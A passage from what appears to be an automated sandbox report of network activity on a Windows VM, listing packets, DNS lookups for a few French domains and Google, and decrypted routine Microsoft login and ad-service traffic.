Nov 21, 2024 09:54:57.748187065 CET	443	49926	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:57.879940033 CET	443	49927	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:57.880775928 CET	49927	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:57.880775928 CET	49927	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:57.880842924 CET	443	49927	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:57.880866051 CET	443	49927	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:58.187436104 CET	443	49925	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:58.190576077 CET	443	49925	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:58.190668106 CET	49925	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:58.190686941 CET	443	49925	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:58.190820932 CET	49925	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:58.190820932 CET	49925	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:58.191071033 CET	49925	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:58.191111088 CET	443	49925	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:58.192514896 CET	443	49926	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:58.193202019 CET	49929	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:58.193253040 CET	443	49929	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:58.193491936 CET	49929	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:58.193492889 CET	49929	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:58.193536997 CET	443	49929	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:58.195564985 CET	443	49926	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:58.195650101 CET	49926	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:58.195650101 CET	49926	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:58.195702076 CET	49926	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:58.195719004 CET	443	49926	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:58.197648048 CET	49930	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:58.197684050 CET	443	49930	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:58.197824001 CET	49930	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:58.197879076 CET	49930	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:58.197889090 CET	443	49930	13.107.246.45	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2024 09:53:36.803095102 CET	53	56617	1.1.1.1	192.168.2.6
Nov 21, 2024 09:53:36.835644960 CET	53	60201	1.1.1.1	192.168.2.6
Nov 21, 2024 09:53:38.658540010 CET	56039	53	192.168.2.6	1.1.1.1
Nov 21, 2024 09:53:38.658682108 CET	49658	53	192.168.2.6	1.1.1.1
Nov 21, 2024 09:53:38.908051014 CET	53	56039	1.1.1.1	192.168.2.6
Nov 21, 2024 09:53:38.911698103 CET	53	49658	1.1.1.1	192.168.2.6
Nov 21, 2024 09:53:39.148154020 CET	53	62234	1.1.1.1	192.168.2.6
Nov 21, 2024 09:53:40.934581041 CET	56793	53	192.168.2.6	1.1.1.1
Nov 21, 2024 09:53:40.934880018 CET	56261	53	192.168.2.6	1.1.1.1
Nov 21, 2024 09:53:41.167893887 CET	53	56793	1.1.1.1	192.168.2.6
Nov 21, 2024 09:53:41.168265104 CET	53	56261	1.1.1.1	192.168.2.6
Nov 21, 2024 09:53:41.357791901 CET	53	49578	1.1.1.1	192.168.2.6
Nov 21, 2024 09:53:43.950522900 CET	59525	53	192.168.2.6	1.1.1.1
Nov 21, 2024 09:53:43.950694084 CET	63458	53	192.168.2.6	1.1.1.1
Nov 21, 2024 09:53:43.951191902 CET	56104	53	192.168.2.6	1.1.1.1
Nov 21, 2024 09:53:43.951365948 CET	59084	53	192.168.2.6	1.1.1.1
Nov 21, 2024 09:53:44.092046976 CET	53	54783	1.1.1.1	192.168.2.6
Nov 21, 2024 09:53:44.152287006 CET	53	56943	1.1.1.1	192.168.2.6
Nov 21, 2024 09:53:44.176307917 CET	53	59525	1.1.1.1	192.168.2.6
Nov 21, 2024 09:53:44.176600933 CET	53	63458	1.1.1.1	192.168.2.6
Nov 21, 2024 09:53:44.204602957 CET	53	56104	1.1.1.1	192.168.2.6
Nov 21, 2024 09:53:44.228815079 CET	53	59084	1.1.1.1	192.168.2.6
Nov 21, 2024 09:53:46.372498989 CET	53	57764	1.1.1.1	192.168.2.6
Nov 21, 2024 09:53:48.613826990 CET	53	56674	1.1.1.1	192.168.2.6
Nov 21, 2024 09:53:56.063750982 CET	53	65237	1.1.1.1	192.168.2.6
Nov 21, 2024 09:54:14.923427105 CET	53	60676	1.1.1.1	192.168.2.6
Nov 21, 2024 09:54:36.692881107 CET	53	61617	1.1.1.1	192.168.2.6
Nov 21, 2024 09:54:37.223503113 CET	53	49381	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 21, 2024 09:53:38.658540010 CET	192.168.2.6	1.1.1.1	0xc89	Standard query (0)	voyages-moinschers.fr	A (IP address)	IN (0x0001)	false
Nov 21, 2024 09:53:38.658682108 CET	192.168.2.6	1.1.1.1	0xcbe2	Standard query (0)	voyages-moinschers.fr	65	IN (0x0001)	false
Nov 21, 2024 09:53:40.934581041 CET	192.168.2.6	1.1.1.1	0xc7bf	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 09:53:40.934880018 CET	192.168.2.6	1.1.1.1	0x7ed5	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 21, 2024 09:53:43.950522900 CET	192.168.2.6	1.1.1.1	0xeb66	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 09:53:43.950694084 CET	192.168.2.6	1.1.1.1	0x8b80	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 21, 2024 09:53:43.951191902 CET	192.168.2.6	1.1.1.1	0xa9d0	Standard query (0)	www.idcom-france.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 09:53:43.951365948 CET	192.168.2.6	1.1.1.1	0x3f2a	Standard query (0)	www.idcom-france.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 21, 2024 09:53:28.443922043 CET	1.1.1.1	192.168.2.6	0x9471	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 09:53:28.443922043 CET	1.1.1.1	192.168.2.6	0x9471	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Nov 21, 2024 09:53:38.908051014 CET	1.1.1.1	192.168.2.6	0xc89	No error (0)	voyages-moinschers.fr		185.221.216.102	A (IP address)	IN (0x0001)	false
Nov 21, 2024 09:53:41.167893887 CET	1.1.1.1	192.168.2.6	0xc7bf	No error (0)	www.google.com		142.250.185.132	A (IP address)	IN (0x0001)	false
Nov 21, 2024 09:53:41.168265104 CET	1.1.1.1	192.168.2.6	0x7ed5	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 21, 2024 09:53:44.176307917 CET	1.1.1.1	192.168.2.6	0xeb66	No error (0)	www.google.com		142.250.186.100	A (IP address)	IN (0x0001)	false
Nov 21, 2024 09:53:44.176600933 CET	1.1.1.1	192.168.2.6	0x8b80	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 21, 2024 09:53:44.204602957 CET	1.1.1.1	192.168.2.6	0xa9d0	No error (0)	www.idcom-france.com		213.186.33.5	A (IP address)	IN (0x0001)	false
Nov 21, 2024 09:53:56.466510057 CET	1.1.1.1	192.168.2.6	0x75e3	No error (0)	g-bing-com.ax-0001.ax-msedge.net	ax-0001.ax-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 09:53:56.466510057 CET	1.1.1.1	192.168.2.6	0x75e3	No error (0)	ax-0001.ax-msedge.net		150.171.27.10	A (IP address)	IN (0x0001)	false
Nov 21, 2024 09:53:56.466510057 CET	1.1.1.1	192.168.2.6	0x75e3	No error (0)	ax-0001.ax-msedge.net		150.171.28.10	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

arc.msn.com

voyages-moinschers.fr

otelrules.azureedge.net

fs.microsoft.com

https:

www.google.com

www.bing.com

tse1.mm.bing.net

ris.api.iris.microsoft.com

slscr.update.microsoft.com

g.bing.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.6	49706	20.190.159.0	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:28 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-11-21 08:53:28 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-21 08:53:28 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Thu, 21 Nov 2024 08:52:28 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C558_SN1 x-ms-request-id: b77f5106-65fb-436c-b2d8-6f44f812754f PPServer: PPV: 30 H: SN1PEPF0002FA4F V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Thu, 21 Nov 2024 08:53:27 GMT Connection: close Content-Length: 11409
2024-11-21 08:53:28 UTC	11409	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.6	49707	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:28 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 55 30 44 4e 32 66 63 4e 61 30 75 50 48 38 5a 75 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 34 35 61 63 37 32 31 65 61 35 30 32 37 36 31 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: U0DN2fcNa0uPH8Zu.1Context: 145ac721ea502761
2024-11-21 08:53:28 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-21 08:53:28 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 55 30 44 4e 32 66 63 4e 61 30 75 50 48 38 5a 75 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 34 35 61 63 37 32 31 65 61 35 30 32 37 36 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 65 43 71 62 73 64 2f 4f 79 57 46 57 67 38 45 48 79 4a 70 32 41 41 73 74 73 6a 69 47 75 76 31 58 36 65 5a 55 44 44 2b 51 49 36 44 78 50 50 7a 37 67 77 39 62 51 46 52 5a 79 63 45 47 74 5a 50 4e 4f 44 62 39 4d 74 36 37 78 31 50 72 76 34 46 39 70 71 75 39 63 56 6a 30 49 79 6c 61 6d 67 67 58 79 4f 38 6f 59 58 2f 62 36 50 6d 65 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: U0DN2fcNa0uPH8Zu.2Context: 145ac721ea502761<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAeeCqbsd/OyWFWg8EHyJp2AAstsjiGuv1X6eZUDD+QI6DxPPz7gw9bQFRZycEGtZPNODb9Mt67x1Prv4F9pqu9cVj0IylamggXyO8oYX/b6Pme
2024-11-21 08:53:28 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 55 30 44 4e 32 66 63 4e 61 30 75 50 48 38 5a 75 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 34 35 61 63 37 32 31 65 61 35 30 32 37 36 31 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: U0DN2fcNa0uPH8Zu.3Context: 145ac721ea502761
2024-11-21 08:53:29 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-21 08:53:29 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 48 55 75 6a 32 64 61 51 48 45 36 47 43 5a 51 61 70 77 67 32 39 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: HUuj2daQHE6GCZQapwg29A.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.6	49709	20.190.159.0	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:30 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-11-21 08:53:30 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-21 08:53:31 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Thu, 21 Nov 2024 08:52:31 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C558_BAY x-ms-request-id: e013f8a9-c34b-4761-bed1-f82d869fd292 PPServer: PPV: 30 H: PH1PEPF00011F32 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Thu, 21 Nov 2024 08:53:30 GMT Connection: close Content-Length: 11409
2024-11-21 08:53:31 UTC	11409	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.6	49710	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:32 UTC	1579	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T085318Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=4be5c8b1edf448e3bf1089f5e22c1f1d&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=594875&metered=false&nettype=ethernet&npid=sc-310091&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=594875&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 Cache-Control: no-cache MS-CV: CnMav3B/lka9YTYu.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-21 08:53:33 UTC	814	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 1408 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-ARC-SIG: hkoZtNibUmYpTaOk/4mao0tjXhUKfazjXYpoV1GGu7srIsLbOZKlQZ6uT8chtQ/05CC6VoDa6e1/xuiIYLHbf/jSU2xf9hUmouFGuflp4/zUiHat1OmxzIf4dpApq39et/VL+QpGKGDRbUNZNDUOPGBjJoH/uB/385r9N3VZthQPP7bmeqXlkmO0siZEhNWn2Gpj9KFseng5o8rMg132+k/RRSdoUwUvGGV2im2b5Fe8y9y5EK46Jl61Da98R6Kgkv7/1HM32c0MLD3CVsC7SWQAcvce4hXTzjZtTTIrs7iI5kV6xMGfzICAjzJ8RDYDNDZTM3u4zecRxuG7Pd5VTw== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Thu, 21 Nov 2024 08:53:32 GMT Connection: close
2024-11-21 08:53:33 UTC	1408	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 45 6d 70 74 79 43 72 65 61 74 69 76 65 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 7d 2c 5c 22 70 72 6f 70 65 72 74 69 65 73 5c 22 3a 7b 7d 2c 5c 22 74 72 61 63 6b 69 6e 67 5c Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"EmptyCreative\",\"propertyManifest\":{},\"properties\":{},\"tracking\

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.6	49711	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:32 UTC	1572	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338389&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T085318Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=3231c04cb2e542ad8ff0b98138491059&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=594875&metered=false&nettype=ethernet&npid=sc-338389&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=594875&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waas [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 Cache-Control: no-cache MS-CV: CnMav3B/lka9YTYu.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: 